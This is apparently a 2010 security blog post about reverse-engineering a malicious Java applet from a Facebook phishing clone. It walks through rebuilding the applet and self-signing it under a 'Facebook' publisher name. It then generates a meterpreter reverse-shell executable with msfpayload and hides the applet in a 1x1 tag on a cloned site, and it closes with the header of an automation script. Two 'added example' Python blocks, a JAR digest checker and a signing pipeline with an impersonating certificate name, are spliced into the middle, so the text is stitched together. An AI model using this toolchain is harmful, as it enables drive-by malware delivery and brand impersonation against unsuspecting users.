About a year ago I stumbled upon a Facebook clone phishing site which contained an evil Java applet.
At the time SET had not been introduced yet, and only a few articles discussing this attack vector had been published (another applet creation process was published by Jabra and described later in the Offensive Security “Metasploit Unleashed” online course).
No source code was released at the time (at least none that I found).
I was curious about this applet and decided to investigate it…
This post describes the “reversing” of the applet: decompiling it to source code, tweaking the code, recompiling, signing, and automating the applet creation process with Python.
When entering the site a Java security warning pops up asking if I would like to run the applet:
I was able to download the applet files by taking the applet’s name from the page and appending the .jar and .class extensions.
Extracted the JAR file:
root@Blackbox:~/Java/facebook# unzip Facebook.jar
Archive:  Facebook.jar
  inflating: META-INF/MANIFEST.MF
  inflating: META-INF/FACEBOOK.SF
  inflating: META-INF/FACEBOOK.DSA
  inflating: desktop.ini
  inflating: Facebook.class
  inflating: home.JPG
  inflating: index.htm
  inflating: index.html
  inflating: Update.class
  inflating: ~$test.htm
Decompiled the class files using a free Java decompiler named JD-GUI.
I reviewed the source code and noticed it all came down to two main files (which were decompiled to Java source): “Update.class” and “Facebook.class”.
I played around with the source and tweaked it a bit. After I made the changes it was time to recreate the class and JAR files and sign them, because the META-INF/FACEBOOK.SF and FACEBOOK.DSA files from the original archive only cover the original class files; a modified class no longer matches the digests they were computed over.
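To make the re-signing requirement concrete, here is a small pure-Python digest checker for the manifest of a signed JAR. It is an added example, not code from the original post or from the applet: a signed JAR carries a SHA1-Digest (or SHA-256-Digest) line per entry in META-INF/MANIFEST.MF, the .SF file digests those manifest sections, and the .DSA/.RSA block signs the .SF. The sample JAR below is constructed for the demo; the entry names mirror the unzip listing above, and the class contents are placeholder bytes, not the real applet. It reports which entries match their manifest digest, which have been tampered with after signing, and which were never covered at all.

```python
#!/usr/bin/env python3
"""Added example: check a signed JAR's META-INF/MANIFEST.MF digests in pure Python.
Not part of the original post; the sample JAR and its contents are constructed."""
import base64
import hashlib
import io
import zipfile

# Attribute names Java's jar/jarsigner use for per-entry digests
DIGEST_ALGS = {"SHA1-Digest": hashlib.sha1, "SHA-256-Digest": hashlib.sha256}


def parse_manifest(text):
    """Return {entry name: {attribute: value}} for the named sections of a manifest.
    Manifest lines are wrapped at 72 bytes; a continuation line starts with one space."""
    unfolded, sections = [], {}
    for line in text.replace("\r\n", "\n").split("\n"):
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]          # join the wrapped continuation
        else:
            unfolded.append(line)
    current = {}
    for line in unfolded:
        if not line:                          # a blank line terminates a section
            if "Name" in current:
                sections[current["Name"]] = current
            current = {}
        elif ":" in line:
            key, value = line.split(":", 1)
            current[key.strip()] = value.strip()
    if "Name" in current:
        sections[current["Name"]] = current
    return sections


def check_manifest_digests(jar_bytes):
    """Return {entry: True | False | None}: True when the stored digest matches the
    entry's bytes, False when it does not (tweaked after signing), None when the
    manifest carries no digest for it (content the signature never covered)."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        sections = parse_manifest(z.read("META-INF/MANIFEST.MF").decode("utf-8"))
        for name in z.namelist():
            if name.startswith("META-INF/") or name.endswith("/"):
                continue                      # signature files and directories are not digested
            data = z.read(name)
            attrs = sections.get(name, {})
            stored = [(base64.b64decode(attrs[k]), fn)
                      for k, fn in DIGEST_ALGS.items() if k in attrs]
            if not stored:
                results[name] = None
            else:
                results[name] = all(fn(data).digest() == d for d, fn in stored)
    return results


def build_sample_jar(entries, tamper=None, extra=None):
    """Constructed sample: write a manifest with correct SHA1 digests for `entries`,
    then optionally overwrite an entry's bytes (tamper) or add an undigested one (extra),
    which is what editing a class or dropping a payload into a signed JAR looks like."""
    manifest = "Manifest-Version: 1.0\r\nCreated-By: example\r\n\r\n"
    for name, data in entries.items():
        manifest += "Name: %s\r\nSHA1-Digest: %s\r\n\r\n" % (
            name, base64.b64encode(hashlib.sha1(data).digest()).decode())
    tamper, extra = tamper or {}, extra or {}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", manifest)
        for name, data in entries.items():
            z.writestr(name, tamper.get(name, data))
        for name, data in extra.items():
            z.writestr(name, data)
    return buf.getvalue()


# Constructed placeholder class bytes; only the file names come from the listing above
SAMPLE = {"Facebook.class": b"\xca\xfe\xba\xbe original loader stub",
          "Update.class": b"\xca\xfe\xba\xbe original updater stub"}

if __name__ == "__main__":
    print(check_manifest_digests(build_sample_jar(SAMPLE)))
    print(check_manifest_digests(build_sample_jar(
        SAMPLE, tamper={"Update.class": b"tweaked"}, extra={"payload.zip": b"PK"})))
```

The checker only validates the manifest digests, not the signature over the .SF file or the signer certificate, so it tells you which entries were changed or added after signing, not whether the signature itself is trustworthy; jarsigner -verify does both.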
Compiling and signing the Java applet manually:
Creating and exporting the certificate for signing the applet (keytool prompts for a keystore password and a distinguished name; the name you enter here is what the Java security warning displays as the publisher, and because the certificate is self-signed the dialog will say the signature cannot be verified):
root@Blackbox:~/Java/facebook# keytool -genkey -keyalg rsa -alias Facebook
root@Blackbox:~/Java/facebook# keytool -export -alias Facebook -file Facebook.crt
Compiling Facebook.java with javac produces two class files, Facebook.class and Update.class, since both classes are defined in the same source file.
Adding both class files into a JAR file:
root@Blackbox:~/Java/facebook# jar cvf Facebook.jar Facebook.class Update.class
Signing the JAR file with the key stored under the Facebook alias (jarsigner reads the key from the keystore, so the exported .crt is not needed for this step; it will prompt for the keystore password):
root@Blackbox:~/Java/facebook# jarsigner Facebook.jar Facebook
Creating a meterpreter executable using Metasploit:
root@Blackbox:~/Java/facebook# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 X > payload.exe
Compressing the executable into a zip file, as the Java source expects:
root@Blackbox:~/Java/facebook# zip -r payload.zip payload.exe
Created a simple HTML file and added the code to display the applet:
<applet code="Facebook.class" archive="Facebook.jar" width="1" height="1"></applet>
Copied index.html, Facebook.class, Facebook.jar and payload.zip to my web server root folder.
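The manual steps above map onto a short Python driver. This is an added example, not NightRanger's script and not SET's code: it builds the keytool, javac, jar and jarsigner command lines as argument lists (so file names never pass through a shell), runs them in order with check=True so a failing compile or signing step stops the run, and finishes with jarsigner -verify so you can confirm which name the JAR is actually signed under. The function names, keystore file, password and certificate DN are illustrative assumptions; a JDK on PATH is required only when the pipeline is really executed, and the runner is injectable so the sequencing can be exercised without one.

```python
#!/usr/bin/env python3
"""Added example: drive the manual keytool/javac/jar/jarsigner steps from Python.
Not the original post's script; names, password and DN below are assumptions."""
import subprocess
from pathlib import Path

# Assumed values; a real tool should take these from the command line.
KEYSTORE = "applet.jks"
STOREPASS = "changeit"   # keytool requires at least 6 characters
DNAME = "CN=Facebook, O=Facebook Inc, C=US"   # the CN is what the warning dialog shows


def keytool_genkey(alias, keystore=KEYSTORE, storepass=STOREPASS, dname=DNAME):
    """argv for a self-signed RSA key pair; passing -dname avoids the interactive prompts."""
    return ["keytool", "-genkeypair", "-keyalg", "RSA", "-keysize", "2048",
            "-alias", alias, "-keystore", keystore, "-storepass", storepass,
            "-keypass", storepass, "-dname", dname, "-validity", "365"]


def javac(sources, outdir="classes"):
    """Compile the applet source; Facebook.java yields Facebook.class and Update.class."""
    return ["javac", "-d", outdir, *sources]


def jar_create(jarfile, classdir="classes"):
    """-C packs everything under classdir at the archive root, as the <applet> tag expects."""
    return ["jar", "cf", jarfile, "-C", classdir, "."]


def jarsigner_sign(jarfile, alias, keystore=KEYSTORE, storepass=STOREPASS):
    return ["jarsigner", "-keystore", keystore, "-storepass", storepass, jarfile, alias]


def jarsigner_verify(jarfile):
    """-certs prints the signer DN, so you can check the publisher name before deploying."""
    return ["jarsigner", "-verify", "-verbose", "-certs", jarfile]


def applet_html(classname, jarfile):
    """The 1x1 applet tag from the post, ready to drop into the cloned page."""
    return ('<applet code="%s" archive="%s" width="1" height="1"></applet>'
            % (classname, jarfile))


def build_pipeline(alias, sources, jarfile):
    """Ordered argv lists for the whole cycle; nothing is executed here."""
    return [keytool_genkey(alias), javac(sources), jar_create(jarfile),
            jarsigner_sign(jarfile, alias), jarsigner_verify(jarfile)]


def run_pipeline(alias, sources, jarfile, runner=subprocess.run):
    """Run each step; check=True raises on the first non-zero exit status.
    `runner` is injectable so the sequencing can be tested without a JDK."""
    cmds = build_pipeline(alias, sources, jarfile)
    for argv in cmds:
        runner(argv, check=True)   # argv list, no shell: file names cannot inject commands
    return cmds


if __name__ == "__main__":
    # keytool refuses to create an alias that already exists, hence the keystore removal
    Path(KEYSTORE).unlink(missing_ok=True)
    Path("classes").mkdir(exist_ok=True)
    run_pipeline("Facebook", ["Facebook.java"], "Facebook.jar")
    Path("index.html").write_text(applet_html("Facebook.class", "Facebook.jar"))
```

Because the key pair is self-signed, the verify step will report the JAR as verified but the certificate chain as untrusted; that matches the warning the victim sees, and is the part of the process SET did not let the author control.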
The result was good and reliable, but every time I wanted to create a new applet I had to start this process all over again, which is a real pain…
Well, we have SET, which does an amazing job of creating those Java applets on the fly, cloning web sites and much, much more…
but I couldn’t control the signing process: SET signs the applet as Microsoft, as shown in the image below:
I decided to polish my Python skills and write a script to automate the applet creation process.
Although my script is neither as versatile nor as elegant as SET’s applet creation process (which also enables creation and execution of Linux payloads), it gets the job done quite nicely for Windows-based systems.
I used the Java code I found in the wild and added a website cloning feature based on SET’s wget syntax.
This is the first version of the script: no error handling or input validation, and the features are limited and basic. Maybe I’ll update it in the future, maybe not.
I hope you find it useful, or that you can learn something from it; I know I did.
#!/usr/bin/python
'''
Created on Jul 4, 2010

@Author: NightRanger, http://exploit.co.il

This script was designed and tested on BackTrack 4 final with metasploit v3.4.1-dev

Requirements: JAVA JDK
Install using: "apt-get install sun-java6-jdk"

Script features:
----------------
- Generates java applet code on the fly
- Generates Keystore / Keystore Removal
- Compiles applet code
- Packages and signs JAR file
- Web site cloning
- Generates applet html code
- Creates a meterpreter executable payload
- Starts apache web server
- Starts MSFConsole listener

* Java applet source code found in the wild, decompiled and tweaked.
* Website clone wget syntax taken from SET.

Change log:
* Jul 5, 2010 - Keystore removal confirmation added